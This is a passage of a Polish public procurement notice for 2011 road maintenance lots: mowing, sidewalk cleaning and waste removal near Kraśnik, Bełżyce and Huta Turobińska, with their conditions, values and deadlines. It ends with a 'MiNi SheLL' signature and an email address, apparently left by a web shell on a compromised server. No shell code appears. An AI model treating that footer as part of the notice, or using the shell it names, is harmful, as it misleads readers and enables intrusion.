7. Wykonawca winien prowadzić prace związane ze sprzątaniem z zachowaniem wszelkich warunków bezpieczeństwa, za wszystkie zdarzenia wynikłe z prowadzonych w sposób nieprawidłowy prac wykonawca ponosi pełną odpowiedzialność.

II.Koszenie trawników w pasie drogowym drogi wojewódzkiej Nr 833 Chodel - Kraśnik w m. Kraśnik ul. Urzędowska  w km 19+220 - 25+096 i ul. Lubelska w km 25+096 - 26+679, str. lewa i prawa.
1. Trawniki należy kosić w zakresach zgodnych z podanym przedmiarem prac oraz  Warunkami wykonania koszenia trawników.
2. Krotność koszeń w ciągu roku wynosi 6.
3. Zamawiający zastrzega sobie prawo zmniejszenia ilości krotności koszenia trawników.
Warunki wykonania koszenia trawników w m. Kraśnik ul. Urzędowska i ul. Lubelska
1. Koszenie obejmuje koszenie traw, samosiewów i jednorocznych odrostów na trawnikach w m. Kraśnik będących w pasie drogowym.
2. Koszenie należy wykonać w sposób gwarantujący należytą jakość usługi.
3. Koszenia dokonać kosiarkami pasiadającymi dopuszczenie do wykonywania
tego rodzaju prac -atesty.
4. Kosiarki winny posiadać fabrycznie montowane osłony.
5. Zabrania się stosowania kosiarek rotacyjnych.
6. W miejscach trudno dostępnych np. przy i pod barierami, wokół pachołków i znaków drogowych oraz innych urządzeniach drogowych należy stosować wykaszarki ręczne.
7. Koszenie należy wykonać na wysokości 2 cm od powierzchni gruntu.
8. Pozostałości po koszeniu Wykonawca zagospodaruje na własny koszt i we własnym zakresie.
9. Wykonawca winien oznakować prowadzone prace zgodnie z Załącznikami Nr 1-4 do rozporządzenia Ministra Infrastruktury z dn. 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków umieszczania na drogach.
10. O każdorazowej potrzebie koszenia trawników Wykonawca będzie powiadamiany  przez Zamawiającego.
11. Odbiór zostanie dokonany po każdorazowym wykonaniu koszenia w okresie 7 dni po pisemnym zgłoszeniu.
12. Wykonawca zobowiązany jest do zapewnienia bezpiecznych warunków pracy  w trakcie jej wykonywania oraz zapewnienia bezpieczeństwa  osobom postronnym i przejeżdżającym pojazdom.
13. Pracownicy winni być ubrani w kamizelki ostrzegawcze, a pracujący sprzęt bezwzględnie winien być wyposażony w lampę błyskową koloru żółtego.
Wielkość lub zakres zamówienia: 37 345,72 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.20.00-0, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr V - Sprzątanie chodników w pasie drogowym w m. Bełżyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprzątanie chodników przy drodze wojewódzkiej Nr 747 Chodel - Konopnica w m. Bełżyce.
1. Sprzątanie winno być wykonywane w każdy wtorek i piątek tygodnia począwszy od  miesiąca kwietnia do listopada w 2011 roku, łącznie 61 sprzątań.
2. Sprzątanie winno być wykonane zgodnie z Warunkami wykonania sprzątania chodników.
3. W przypadku gdy w dany wtorek lub piątek wypada święto, sprzątanie należy wykonać w następny dzień roboczy. 
Warunki wykonania sprzątania chodników w ciągu drogi wojewódzkiej Nr 747 w m. Bełżyce.
1. Sprzątanie należy prowadzić zgodnie z  podanym przedmiarem prac.
2. Sprzątanie obejmuje cały pas drogowy łącznie z chodnikiem, pasem zieleni i znajdującymi się w pasie żywopłotami.
3. Sprzątanie polega na wyzbieraniu wszelkich nieczystości występujących w pasie drogowym.
4. Zebrane nieczystości Wykonawca utylizuje we własnym zakresie i na własny koszt.
5. Pracownicy dokonujący sprzątania powinni być ubrani w kamizelki ostrzegawcze.
6. Wykonawca winien prowadzić prace związane ze sprzątaniem z zachowaniem wszelkich warunków bezpieczeństwa.
7. Za wszystkie zdarzenia wynikłe z prowadzonych w sposób nieprawidłowy robót wykonawca ponosi pełną odpowiedzialność.
Wielkość lub zakres zamówienia: 8 664,68 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.51.13.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr VI - Wywóz nieczystości z 4 szt. koszy na śmieci łącznie z uprzątnięciem terenu parkingu leśnego przy drodze wojewódzkiej Nr 835 Lublin - Biłgoraj w m. Huta Turobińska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wywóz nieczystości z 4 szt. koszy na śmieci wraz z wymianą worków oraz uprzątnięcie terenu parkingu leśnego w granicach pasa drogowego parkingu leśnego przy drodze wojewódzkiej Nr 835 Lublin - Biłgoraj w m. Huta Turobińska, km 55+150, str. lewa.
1. Wywóz nieczystości winien odbywać się we czwartek każdego tygodnia począwszy od 1 lutego do 31 grudnia 2011 r. (48 razy w ciągu roku) lub na wezwanie Zamawiającego, w terminie dwudniowym od daty zgłoszenia. W przypadku gdy w dany czwartek wypada święto wywóz nieczystości wykonać w następny dzień roboczy.
2. Ponadto zamówienie obejmuje wywóz fekalii z wc przy parkingu w ilości 2 razy w ciągu roku.
3. Wykonawca we własnym zakresie i na koszt własny zagospodaruje nieczystości pochodzące z koszy, terenu pasa drogowego oraz fekalia z wc.
4. Zagospodarowanie nieczystości winno być zgodne z wymaganiami dotyczącymi ochrony środowiska.
5. Zamawiający zastrzega sobie prawo do zmniejszenia zakresu prac. Wykonawca otrzyma wynagrodzenie za faktycznie wykonaną usługę wynikającą z krotności wywiezionych nieczystości pomnożonych przez cenę jednostkową za wywóz.
Wielkość lub zakres zamówienia: 10 994,00 zł netto.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5, 90.41.00.00-4, 90.91.40.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com